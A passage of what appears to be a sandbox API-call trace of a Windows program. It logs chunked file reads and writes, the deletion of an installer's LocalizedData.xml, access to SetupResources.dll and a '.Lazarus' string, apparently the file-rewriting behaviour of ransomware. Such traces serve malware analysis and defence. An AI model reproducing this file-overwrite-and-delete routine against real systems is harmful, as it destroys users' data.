[0066.580] GetLastError () returned 0x0 [0066.580] SetLastError (dwErrCode=0x0) [0066.580] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.580] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.580] GetLastError () returned 0x0 [0066.580] SetLastError (dwErrCode=0x0) [0066.580] GetLastError () returned 0x0 [0066.580] SetLastError (dwErrCode=0x0) [0066.581] GetLastError () returned 0x0 [0066.581] SetLastError (dwErrCode=0x0) [0066.581] GetLastError () returned 0x0 [0066.581] SetLastError (dwErrCode=0x0) [0066.581] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.581] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.581] GetLastError () returned 0x0 [0066.581] SetLastError (dwErrCode=0x0) [0066.581] GetLastError () returned 0x0 [0066.581] SetLastError (dwErrCode=0x0) [0066.581] GetLastError () returned 0x0 [0066.581] SetLastError (dwErrCode=0x0) [0066.582] GetLastError () returned 0x0 [0066.582] SetLastError (dwErrCode=0x0) [0066.582] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.582] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.582] GetLastError () returned 0x0 [0066.582] SetLastError (dwErrCode=0x0) [0066.582] GetLastError () returned 0x0 [0066.582] SetLastError (dwErrCode=0x0) [0066.582] GetLastError () returned 0x0 [0066.582] SetLastError (dwErrCode=0x0) [0066.582] GetLastError () returned 0x0 [0066.582] SetLastError (dwErrCode=0x0) [0066.583] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.583] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.583] GetLastError () returned 0x0 [0066.583] SetLastError (dwErrCode=0x0) [0066.583] GetLastError () returned 0x0 [0066.583] SetLastError (dwErrCode=0x0) [0066.583] GetLastError () returned 0x0 [0066.583] SetLastError (dwErrCode=0x0) [0066.583] GetLastError () returned 0x0 [0066.583] SetLastError (dwErrCode=0x0) [0066.583] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.584] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.584] GetLastError () returned 0x0 [0066.584] SetLastError (dwErrCode=0x0) [0066.584] GetLastError () returned 0x0 [0066.584] SetLastError (dwErrCode=0x0) [0066.584] GetLastError () returned 0x0 [0066.584] SetLastError (dwErrCode=0x0) [0066.584] GetLastError () returned 0x0 [0066.584] SetLastError (dwErrCode=0x0) [0066.584] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x412, lpOverlapped=0x0) returned 1 [0066.584] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.585] GetLastError () returned 0x0 [0066.585] SetLastError (dwErrCode=0x0) [0066.585] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.585] GetLastError () returned 0x0 [0066.585] SetLastError (dwErrCode=0x0) [0066.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cfa0 [0066.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0066.585] GetLastError () returned 0x0 [0066.585] SetLastError (dwErrCode=0x0) [0066.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0066.585] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0x420, lpOverlapped=0x0) returned 1 [0066.585] GetLastError () returned 0x0 [0066.586] SetLastError (dwErrCode=0x0) [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.586] GetLastError () returned 0x0 [0066.586] SetLastError (dwErrCode=0x0) [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0066.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.586] CloseHandle (hObject=0x428) returned 1 [0066.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.589] CloseHandle (hObject=0x420) returned 1 [0066.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0066.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0066.589] AreFileApisANSI () returned 1 [0066.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0066.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0066.589] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.590] GetFileType (hFile=0x420) returned 0x1 [0066.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0066.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.591] GetLastError () returned 0xb7 [0066.591] SetLastError (dwErrCode=0xb7) [0066.591] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.592] CloseHandle (hObject=0x420) returned 1 [0066.592] AreFileApisANSI () returned 1 [0066.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0066.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0066.592] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.688] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0066.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0066.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.689] AreFileApisANSI () returned 1 [0066.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.689] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0066.690] AreFileApisANSI () returned 1 [0066.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0066.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0066.690] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.690] GetFileType (hFile=0x420) returned 0x1 [0066.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0066.690] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.690] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.690] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.691] CloseHandle (hObject=0x420) returned 1 [0066.691] AreFileApisANSI () returned 1 [0066.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0066.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0066.691] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.691] GetFileType (hFile=0x420) returned 0x1 [0066.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0066.691] CloseHandle (hObject=0x420) returned 1 [0066.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0066.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0066.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0066.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0066.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.692] AreFileApisANSI () returned 1 [0066.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0066.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 46 [0066.692] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.692] AreFileApisANSI () returned 1 [0066.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0066.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.693] GetLastError () returned 0x0 [0066.693] SetLastError (dwErrCode=0x0) [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e458 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0066.693] GetLastError () returned 0x0 [0066.693] SetLastError (dwErrCode=0x0) [0066.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71ca0 [0066.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0066.693] AreFileApisANSI () returned 1 [0066.693] MultiByteToWideChar (in: 